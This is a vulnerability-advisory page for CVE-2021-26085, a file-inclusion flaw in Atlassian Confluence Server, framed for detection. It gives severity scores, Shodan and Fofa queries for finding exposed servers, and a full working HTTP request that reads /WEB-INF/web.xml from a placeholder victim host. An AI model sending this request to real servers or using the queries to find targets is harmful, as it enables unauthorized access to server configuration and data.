🔙 목록으로 돌아가기

CVE-2021-26085: Atlassian Confluence Server - Local File Inclusion

TitleAtlassian Confluence Server - Local File Inclusion
Authorprincechaddha
SeverityMedium
ImpactAn attacker can access sensitive information stored on the server, potentially leading to unauthorized access or data leakage.
RemediationApply the latest security patches provided by Atlassian to fix the vulnerability.
CVSS Score5.3
EPSS Score0.94012
CVE IDCVE-2021-26085
CWE IDCWE-425
Shodan Queryhttp.component:"Atlassian Confluence"http.component:"atlassian confluence"
Fofa Queryapp="atlassian-confluence"
Tags cve2021 cve kev packetstorm confluence atlassian lfi intrusive vkev vuln

🔍 Vulnerability Description

Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.

🌐 HTTP Request

GET /s/38FIlOnCervP7W07XnOgazdJxUB/_/;/WEB-INF/web.xml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ConnectPC Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-26085.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-26085.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A